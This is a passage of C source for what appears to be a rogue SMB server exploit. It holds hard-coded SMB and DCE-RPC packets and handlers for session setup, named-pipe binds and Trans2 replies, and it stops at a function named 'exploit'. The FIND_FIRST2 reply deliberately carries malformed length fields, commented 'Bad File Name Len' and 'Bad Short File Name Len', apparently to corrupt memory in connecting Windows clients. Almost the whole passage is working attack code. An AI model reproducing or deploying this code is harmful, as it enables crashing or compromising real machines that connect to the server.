3\\x00\\x00\\x00\\x43\\x00\\x24\\x00"\r\n"\\x00\\x00\\x39\\x00\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00"\r\n"\\x53\\x00\\x74\\x00\\x61\\x00\\x6e\\x00\\x64\\x00\\x61\\x00\\x72\\x00\\x64\\x00"\r\n"\\x66\\x00\\x72\\x00\\x65\\x00\\x69\\x00\\x67\\x00\\x61\\x00\\x62\\x00\\x65\\x00"\r\n"\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00";\r\n\r\nunsigned char OpenPrinterEx[] =\r\n"\\x00\\x00\\x00\\x68"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00"\r\n"\\x30\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x24\\xd7\\x9c\\xf8\\xbb\\xe1\\xd9\\x11\\xb9\\x29\\x00\\x10"\r\n"\\xdc\\x4a\\x6b\\xbb\\x00\\x00\\x00\\x00";\r\n\r\nunsigned char ClosePrinter[] =\r\n"\\x00\\x00\\x00\\x68"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00"\r\n"\\x30\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00";\r\n\r\nunsigned char OpenHklm[] =\r\n"\\x00\\x00\\x00\\x68"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00"\r\n"\\x30\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x4e\\x4c\\xb2\\xf8\\xbb\\xe1\\xd9\\x11\\xb9\\x29\\x00\\x10"\r\n"\\xdc\\x4a\\x6b\\xbb\\x00\\x00\\x00\\x00";\r\n\r\nunsigned char OpenKey[] =\r\n"\\x00\\x00\\x00\\x68"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00"\r\n"\\x30\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00";\r\n\r\nunsigned char CloseKey[] =\r\n"\\x00\\x00\\x00\\x68"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00"\r\n"\\x30\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00";\r\n\r\nunsigned char NetBios1[] =\r\n"\\x00\\x00\\x00\\x94"\r\n"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x5c\\x00\\x38"\r\n"\\x00\\x00\\x00\\x00\\x00\\x5d\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00"\r\n"\\x5c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x44\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x01\\x00\\x00\\x00\\xc0\\xa2\\x16\\x00\\xae\\xc2\\x16\\x00\\x00\\x00\\x00\\x00"\r\n"\\xbe\\xc2\\x16\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00"\r\n"\\x6e\\x00\\x65\\x00\\x74\\x00\\x62\\x00\\x69\\x00\\x6f\\x00\\x73\\x00\\x00\\x00"\r\n"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x2e\\x00"\r\n"\\x00\\x00\\x00\\x00";\r\n\r\nunsigned char NetBios2[] =\r\n"\\x00\\x00\\x00\\x3e"\r\n"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x07\\xff\\x00\\x3e\\x00\\x01\\x00\\xff\\x01\\x00\\x00\\xff\\x01\\x00\\x00\\x0d"\r\n"\\x00\\x41\\x3a\\x00\\x4e\\x00\\x54\\x00\\x46\\x00\\x53\\x00\\x00\\x00";\r\n\r\n// Trans2 Response, QUERY_PATH_INFO\r\nunsigned char Trans2Response1[] =\r\n"\\x00\\x00\\x00\\x64"\r\n"\\xff\\x53\\x4d\\x42" // SMB\r\n"\\x32" // SMB Command: Trans2 (0x32)\r\n"\\x00\\x00\\x00\\x00" // NT Status: STATUS_SUCCESS (0x00000000)\r\n"\\x98" // Flags: 0x98\r\n"\\x07\\xc8" // Flags2 : 0xc807\r\n"\\x00\\x00" // Process ID High: 0\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Signature: 0000000000000000\r\n"\\x00\\x00" // Reserved: 0000\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a" // Word Count (WCT): 10\r\n"\\x02\\x00" // Total Parameter Count: 2\r\n"\\x28\\x00" // Total Data Count: 40\r\n"\\x00\\x00" // Reserved: 0000\r\n"\\x02\\x00" // Parameter Count: 2\r\n"\\x38\\x00" // Parameter Offset: 56\r\n"\\x00\\x00" // Parameter Displacement: 0\r\n"\\x28\\x00" // Data Count: 40\r\n"\\x3c\\x00" // Data Offset: 60\r\n"\\x00\\x00" // Data Displacement: 0\r\n"\\x00" // Setup Count: 0\r\n"\\x00" // Reserved: 00\r\n"\\x2d\\x00" // Byte Count (BCC): 45\r\n"\\x00" // Padding: 00\r\n"\\x00\\x00" // EA Error offset: 0\r\n"\\x00\\x01" // Padding: 0001\r\n"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01" // Created: Jun 17, 2005 05:39:19.686500000\r\n"\\x8c\\x24\\xba\\x5c\\x3a\\x73\\xc5\\x01" // Last Access: Jun 17, 2005 05:44:55.092750000\r\n"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01" // Last Write: Jun 17, 2005 05:39:19.686500000\r\n"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01" // Change: Jun 17, 2005 05:39:25.717750000\r\n"\\x10\\x00\\x00\\x00" // File Attributes: 0x00000010\r\n"\\x00\\x00\\x00\\x00"; // Unknown Data: 00000000\r\n\r\n// Trans2 Response, QUERY_PATH_INFO\r\nunsigned char Trans2Response2[] = // ERROR Response\r\n"\\x00\\x00\\x00\\x23"\r\n"\\xff\\x53\\x4d\\x42\\x32\\x34\\x00\\x00\\xc0\\x98\\x07\\xc8\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x00\\x00\\x00";\r\n\r\n// Trans2 Response, FIND_FIRST2, Files: . ..\r\nunsigned char Trans2Response3[] =\r\n"\\x00\\x00\\x01\\x0c"\r\n"\\xff\\x53\\x4d\\x42" // SMB\r\n"\\x32" // SMB Command: Trans2 (0x32)\r\n"\\x00\\x00\\x00\\x00" // NT Status: STATUS_SUCCESS (0x00000000)\r\n"\\x98" // Flags: 0x98\r\n"\\x07\\xc8" // Flags2 : 0xc807\r\n"\\x00\\x00" // Process ID High: 0\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Signature: 0000000000000000\r\n"\\x00\\x00" // Reserved: 0000\r\n"\\x00\\x00" // Tree ID: 0\r\n"\\x00\\x00" // Process ID: 0\r\n"\\x00\\x00" // USER ID\r\n"\\x00\\x00" // Multiplex ID: 0\r\n"\\x0a" // Word Count (WCT): 10\r\n"\\x0a\\x00" // Total Parameter Count: 10\r\n"\\xc8\\x00" // Total Data Count: 200\r\n"\\x00\\x00" // Reserved: 0000\r\n"\\x0a\\x00" // Parameter Count: 10\r\n"\\x38\\x00" // Parameter Offset: 56\r\n"\\x00\\x00" // Parameter Displacement: 0\r\n"\\xc8\\x00" // Data Count: 200\r\n"\\x44\\x00" // Data Offset: 68\r\n"\\x00\\x00" // Data Displacement: 0\r\n"\\x00" // Setup Count: 0\r\n"\\x00" // Reserved: 00\r\n"\\xd5\\x00" // Byte Count (BCC): 213\r\n"\\x00" // Padding: 00\r\n"\\x01\\x08" // Search ID: 0x0801\r\n"\\x02\\x00" // Seatch Count: 2\r\n"\\x01\\x00" // End of Search: 1\r\n"\\x00\\x00" // EA Error offset: 0\r\n"\\x60\\x00" // Last Name offset: 96\r\n"\\x38\\x00" // Padding: 3800\r\n"\\x60\\x00\\x00\\x00" // Next Entry offset: 96\r\n"\\x00\\x00\\x00\\x00" // File Index: 0\r\n"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01" // Created: Jun 17, 2005 05:39:19.686500000\r\n"\\xac\\x09\\x3c\\xae\\x39\\x73\\xc5\\x01" // Last Access: Jun 17, 2005 05:40:02.342750000\r\n"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01" // Last Write: Jun 17, 2005 05:39:19.686500000\r\n"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01" // Change: Jun 17, 2005 05:39:25.717750000\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // End of File: 0\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Allocation Size: 0\r\n"\\x10\\x00\\x00\\x00" // File Attributes: 0x00000010\r\n//"\\x02\\x00\\x00\\x00" // File Name Len: 2\r\n"\\xff\\xff\\xff\\xff" // Bad File Name Len\r\n"\\x00\\x00\\x00\\x00" // EA List Length: 0\r\n//"\\x00" // Short File Name Len: 0\r\n"\\xff" // Bad Short File Name Len\r\n"\\x00" // Reserved: 00\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Short File Name:\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Short File Name:\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Short File Name:\r\n"\\x2e\\x00" // File Name: .\r\n"\\x00\\x00\\x00\\x00" // Next Entry Offset: 0\r\n"\\x00\\x00\\x00\\x00" // File Index: 0\r\n"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01" // Created: Jun 17, 2005 05:39:19.686500000\r\n"\\xac\\x09\\x3c\\xae\\x39\\x73\\xc5\\x01" // Last Access: Jun 17, 2005 05:40:02.342750000\r\n"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01" // Last Write: Jun 17, 2005 05:39:19.686500000\r\n"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01" // Change: Jun 17, 2005 05:39:25.717750000\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // End Of File: 0\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Allocation Size: 0\r\n"\\x10\\x00\\x00\\x00" // File Attributes: 0x00000010\r\n"\\x04\\x00\\x00\\x00" // File Name Len: 4\r\n"\\x00\\x00\\x00\\x00" // EA List Length: 0\r\n"\\x00" // Short File Name Len: 0\r\n"\\x00" // Reserved: 00\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Short File Name:\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Short File Name:\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" // Short File Name:\r\n"\\x2e\\x00\\x2e\\x00" // File Name: ..\r\n"\\x00\\x00\\x00\\x00\\x00\\x00"; // Unknown Data: 000000000000\r\n\r\nint\r\ncheck_interface ( char* str )\r\n{\r\n\tint i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;\r\n\r\n\t//Interface UUID\r\n\tunsigned char wks_uuid[] = "\\x98\\xd0\\xff\\x6b\\x12\\xa1\\x10\\x36\\x98\\x33\\x46\\xc3\\xf8\\x7e\\x34\\x5a";\r\n\tunsigned char srv_uuid[] = "\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88";\r\n\tunsigned char spl_uuid[] = "\\x78\\x56\\x34\\x12\\x34\\x12\\xcd\\xab\\xef\\x00\\x01\\x23\\x45\\x67\\x89\\xab";\r\n\tunsigned char wrg_uuid[] = "\\x01\\xd0\\x8c\\x33\\x44\\x22\\xf1\\x31\\xaa\\xaa\\x90\\x00\\x38\\x00\\x10\\x03";\r\n\r\n\tfor ( i = 0; i < 16; i++ )\r\n\t{\r\n\t\tj = 0;\r\n\t\tif ( str[120 + i] < 0 )\r\n\t\t{\r\n\t\t\tif ( ( str[120 + i] + 0x100 ) == wks_uuid[i] )\r\n\t\t\t\t{ wks++; j = 1; }\r\n\t\t\tif ( ( str[120 + i] + 0x100 ) == srv_uuid[i] )\r\n\t\t\t\t{ srv++; j = 1; }\r\n\t\t\tif ( ( str[120 + i] + 0x100 ) == spl_uuid[i] )\r\n\t\t\t\t{ spl++; j = 1; }\r\n\t\t\tif ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] )\r\n\t\t\t\t{ wrg++; j = 1; }\r\n\t\t\tif ( j == 0 )\r\n\t\t\t\tfoo++;\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tif ( str[120 + i] == wks_uuid[i] )\r\n\t\t\t\t{ wks++; j = 1; }\r\n\t\t\tif ( str[120 + i] == srv_uuid[i] )\r\n\t\t\t\t{ srv++; j = 1; }\r\n\t\t\tif ( str[120 + i] == spl_uuid[i] )\r\n\t\t\t\t{ spl++; j = 1; }\r\n\t\t\tif ( str[120 + i] == wrg_uuid[i] )\r\n\t\t\t\t{ wrg++; j = 1; }\r\n\t\t\tif ( j == 0 )\r\n\t\t\t\tfoo++;\r\n\t\t}\r\n\t}\r\n\tif ( wks == 16 )\r\n\t\treturn ( 0 );\r\n\telse if ( srv == 16 )\r\n\t\treturn ( 1 );\r\n\telse if ( spl == 16 )\r\n\t\treturn ( 2 );\r\n\telse if ( wrg == 16 )\r\n\t\treturn ( 3 );\r\n\telse\r\n\t{\r\n\t\tprintf ( "there is/are %d invalid byte(s) in the interface UUID!\\n", foo );\r\n\t\treturn ( -1 );\r\n\t}\r\n}\r\n\r\nvoid\r\nneg ( int s )\r\n{\r\n\tchar response[1024];\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tsend ( s, SmbNeg, sizeof ( SmbNeg ) -1, 0 );\r\n}\r\n\r\nvoid\r\nsessionsetup ( int s, unsigned long userid, unsigned long treeid, int option )\r\n{\r\n\tchar response[1024];\r\n\tunsigned char ntlm_challenge1[] = "\\xa2\\x75\\x1b\\x10\\xe7\\x62\\xb0\\xc3";\r\n\tunsigned char ntlm_challenge2[] = "\\xe1\\xed\\x43\\x66\\xc7\\xa7\\x36\\xbd";\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "SessionSetupAndXNeg\\n" );\r\n\tSessionSetupAndXNeg[30] = response[30];\r\n\tSessionSetupAndXNeg[31] = response[31];\r\n\tSessionSetupAndXNeg[34] = response[34];\r\n\tSessionSetupAndXNeg[35] = response[35];\r\n\r\n\tstrncpy ( SessionSetupAndXNeg + 32, ( unsigned char* ) &userid, 2 );\r\n\tif ( option == 0 )\r\n\t\tmemcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 );\r\n\telse\r\n\t\tmemcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 );\r\n\r\n\tsend ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "SessionSetupAndXAuth\\n" );\r\n\tSessionSetupAndXAuth[30] = response[30];\r\n\tSessionSetupAndXAuth[31] = response[31];\r\n\tSessionSetupAndXAuth[34] = response[34];\r\n\tSessionSetupAndXAuth[35] = response[35];\r\n\r\n\tstrncpy ( SessionSetupAndXAuth + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "TreeConnectAndX\\n" );\r\n\tTreeConnectAndX[30] = response[30];\r\n\tTreeConnectAndX[31] = response[31];\r\n\tTreeConnectAndX[34] = response[34];\r\n\tTreeConnectAndX[35] = response[35];\r\n\r\n\tstrncpy ( TreeConnectAndX + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( TreeConnectAndX + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 );\r\n}\r\n\r\nvoid\r\ndigg ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid, int option )\r\n{\r\n\tint ret;\r\n\tchar response[1024];\r\n\tunsigned char srv[] = "\\x73\\x72\\x76";\r\n\tunsigned char wks[] = "\\x77\\x6b\\x73";\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "SmbNtCreate\\n" );\r\n\tSmbNtCreate[30] = response[30];\r\n\tSmbNtCreate[31] = response[31];\r\n\tSmbNtCreate[34] = response[34];\r\n\tSmbNtCreate[35] = response[35];\r\n\r\n\tstrncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 );\r\n\tstrncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 );\r\n\r\n\tsend ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "DceRpc\\n" );\r\n\tDceRpc[30] = response[30];\r\n\tDceRpc[31] = response[31];\r\n\tDceRpc[34] = response[34];\r\n\tDceRpc[35] = response[35];\r\n\r\n\tstrncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 );\r\n\tstrncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 );\r\n\r\n\tret = check_interface ( response );\r\n\tif ( ret == 0 )\r\n\t\tmemcpy ( DceRpc + 92, wks, 3 );\r\n\telse if ( ret == 1 )\r\n\t\tmemcpy ( DceRpc + 92, srv, 3 );\r\n\telse if ( ret == 2 );\r\n\telse if ( ret == 3 );\r\n\telse\r\n\t{\r\n\t\tprintf ( "invalid interface uuid, aborting...\\n" );\r\n\t\texit ( 1 );\r\n\t}\r\n\r\n\tsend ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tif ( option == 1 )\r\n\t{\r\n\t\tprintf ( "NetrShareEnum\\n" );\r\n\t\tNetrShareEnum[30] = response[30];\r\n\t\tNetrShareEnum[31] = response[31];\r\n\t\tNetrShareEnum[34] = response[34];\r\n\t\tNetrShareEnum[35] = response[35];\r\n\r\n\t\tstrncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );\r\n\t}\r\n\telse if ( ( option == 2 ) && ( ret == 2 ) )\r\n\t{\r\n\t\tprintf ( "OpenPrinterEx\\n" );\r\n\t\tOpenPrinterEx[30] = response[30];\r\n\t\tOpenPrinterEx[31] = response[31];\r\n\t\tOpenPrinterEx[34] = response[34];\r\n\t\tOpenPrinterEx[35] = response[35];\r\n\r\n\t\tstrncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );\r\n\r\n\t\tbzero ( &response, sizeof ( response ) );\r\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\t\tprintf ( "ClosePrinter\\n" );\r\n\t\tClosePrinter[30] = response[30];\r\n\t\tClosePrinter[31] = response[31];\r\n\t\tClosePrinter[34] = response[34];\r\n\t\tClosePrinter[35] = response[35];\r\n\r\n\t\tstrncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 );\r\n\t}\r\n\telse if ( ( option == 3 ) && ( ret == 3 ) )\r\n\t{\r\n\t\tprintf ( "OpenHklm\\n" );\r\n\t\tOpenHklm[30] = response[30];\r\n\t\tOpenHklm[31] = response[31];\r\n\t\tOpenHklm[34] = response[34];\r\n\t\tOpenHklm[35] = response[35];\r\n\r\n\t\tstrncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );\r\n\r\n\t\tbzero ( &response, sizeof ( response ) );\r\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\t\tprintf ( "OpenKey\\n" );\r\n\t\tOpenKey[30] = response[30];\r\n\t\tOpenKey[31] = response[31];\r\n\t\tOpenKey[34] = response[34];\r\n\t\tOpenKey[35] = response[35];\r\n\r\n\t\tstrncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );\r\n\r\n\t\tbzero ( &response, sizeof ( response ) );\r\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\t\tprintf ( "CloseKey\\n" );\r\n\t\tCloseKey[30] = response[30];\r\n\t\tCloseKey[31] = response[31];\r\n\t\tCloseKey[34] = response[34];\r\n\t\tCloseKey[35] = response[35];\r\n\r\n\t\tstrncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );\r\n\t}\r\n\telse if ( option == 4 )\r\n\t{\r\n\t\tprintf ( "NetBios1\\n" );\r\n\t\tNetBios1[30] = response[30];\r\n\t\tNetBios1[31] = response[31];\r\n\t\tNetBios1[34] = response[34];\r\n\t\tNetBios1[35] = response[35];\r\n\r\n\t\tstrncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );\r\n\t}\r\n\telse\r\n\t{\r\n\t\tif ( ret == 0 )\r\n\t\t{\r\n\t\t\tprintf ( "WksSvc\\n" );\r\n\t\t\tWksSvc[30] = response[30];\r\n\t\t\tWksSvc[31] = response[31];\r\n\t\t\tWksSvc[34] = response[34];\r\n\t\t\tWksSvc[35] = response[35];\r\n\r\n\t\t\tstrncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\t\tstrncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\t\tsend ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tprintf ( "SrvSvc\\n" );\r\n\t\t\tSrvSvc[30] = response[30];\r\n\t\t\tSrvSvc[31] = response[31];\r\n\t\t\tSrvSvc[34] = response[34];\r\n\t\t\tSrvSvc[35] = response[35];\r\n\r\n\t\t\tstrncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\t\tstrncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\t\tsend ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );\r\n\t\t}\r\n\t}\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "SmbClose\\n" );\r\n\tSmbClose[30] = response[30];\r\n\tSmbClose[31] = response[31];\r\n\tSmbClose[34] = response[34];\r\n\tSmbClose[35] = response[35];\r\n\r\n\tstrncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );\r\n}\r\n\r\nvoid\r\nexploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, 